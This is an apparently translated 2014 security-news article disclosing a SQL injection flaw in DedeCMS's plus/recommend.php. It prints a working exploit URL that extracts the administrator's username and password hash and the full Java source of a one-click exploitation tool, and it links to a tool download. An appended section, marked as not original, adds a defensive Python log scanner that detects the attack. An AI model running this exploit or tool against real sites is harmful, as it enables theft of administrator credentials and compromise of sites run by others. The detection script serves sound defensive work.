DedeCMS SQL Injection Vulnerability Affecting All Versions: Exploit Code and Tool (February 28, 2014)
Published: 2014-02-28 20:51:35 Author: anonymous

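A user recently discovered an SQL injection vulnerability in dedecms that works against every version. The latest official release already fixes it, so download the patch from the vendor as soon as possible.
dedecms, also known as 織夢, is an open-source PHP website content management system. DedeCms is known for being simple, practical and open source; it is the best-known open-source PHP site management system in China and the PHP CMS with the most users.
A user recently discovered an SQL injection vulnerability in dedecms that works against every version; the latest official release already fixes it. The exploit code is as follows:
EXP: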
http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
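Requesting this URL directly returns the administrator's username and encrypted password, as shown in the figure below.
Exploit tool source code (by 園長):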
package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {
private static final long serialVersionUID = 1L;
/**
* Creates new form MainFrame
*/
public MainFrame() {
initComponents();
}
public String request(String url){
String str = "",tmp;
try {
BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
while((tmp=br.readLine())!=null){
str+=tmp+"\r\n";
}
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
return str;
}
private void initComponents() {
jPanel1 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
jTextField1 = new javax.swing.JTextField();
jButton1 = new javax.swing.JButton();
jScrollPane1 = new javax.swing.JScrollPane();
jTextArea1 = new javax.swing.JTextArea();
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
jLabel1.setText("URL:");
jTextField1.setText("http://localhost");
this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
jButton1.setText("獲取");
jButton1.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
jButton1ActionPerformed(evt);
}
});
jTextArea1.setColumns(20);
jTextArea1.setRows(5);
jScrollPane1.setViewportView(jTextArea1);
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
pack();
}// </editor-fold>
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String url = jTextField1.getText();
if(null==url||"".equals(url)){
return ;
}
String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
String[] s = m.group(1).split("\\|");
if(s.length>2){
jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
}
}
}
public static void main(String args[]) {
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new MainFrame().setVisible(true);
}
});
}
// Variables declaration - do not modify
private javax.swing.JButton jButton1;
private javax.swing.JLabel jLabel1;
private javax.swing.JPanel jPanel1;
private javax.swing.JScrollPane jScrollPane1;
private javax.swing.JTextArea jTextArea1;
private javax.swing.JTextField jTextField1;
// End of variables declaration
}
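Exploit tool download address: http://pan.baidu.com/s/1i37LUnF (The programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!)

Official dedecms patch address: http://www.dedecms.com/pl/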
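For log review on sites that ran an unpatched version: the request shown on this page carries `_FILES[...]` keys in the URL query string, which a genuine browser upload never does (uploaded files travel in a multipart POST body), together with MySQL versioned comments (`/*!50000`) and the `#@__admin` table reference. The following Python example is added here and is not part of the original article or of DedeCMS; the log lines are constructed (documentation-range IPs, a truncated non-working query), and the function and indicator names are illustrative.

```python
import re

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL versioned comment, e.g. /*!50000union*/ as seen in the request on this page.
VERSIONED_COMMENT_RE = re.compile(r"/\*!\d{5}")

from urllib.parse import unquote_plus

# Constructed sample log lines; not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Feb/2014:21:02:11 +0800] "GET /plus/recommend.php?action=&aid=1 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [28/Feb/2014:21:03:40 +0800] "GET /plus/recommend.php?action=&aid=1'
    '&_FILES%5Btype%5D%5Btmp_name%5D=x%20/*!50000union*//*!50000select*/1,(select%201%20from%20%60%23@__admin%60)'
    '&_FILES[type][name]=1.jpg HTTP/1.1" 200 4294',
    '203.0.113.9 - - [28/Feb/2014:21:05:02 +0800] "POST /member/upload.php HTTP/1.1" 200 812',
]

def classify(target):
    """Return the indicator names found in one request target (path?query)."""
    hits = []
    def add(name):
        if name not in hits:
            hits.append(name)
    for pair in target.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        # Decode so that %5B/%5D-encoded brackets and %23 are seen as [ ] and #.
        key, value = unquote_plus(key), unquote_plus(value)
        if key.startswith("_FILES["):      # upload superglobal supplied as a URL parameter
            add("files_in_query")
        if VERSIONED_COMMENT_RE.search(value):
            add("versioned_comment")
        if "#@__" in value:                # table reference as written in the page's request
            add("table_prefix_token")
    return hits

def scan(lines):
    """Return (client_ip, path, indicators) for every suspicious log line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify(m.group(1))
        if hits:
            findings.append((line.split()[0], m.group(1).partition("?")[0], hits))
    return findings

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ",".join(hits))
```

Any hit on `files_in_query` against `/plus/recommend.php` predating the patch is a reason to rotate the administrator password, since the request returns its stored hash.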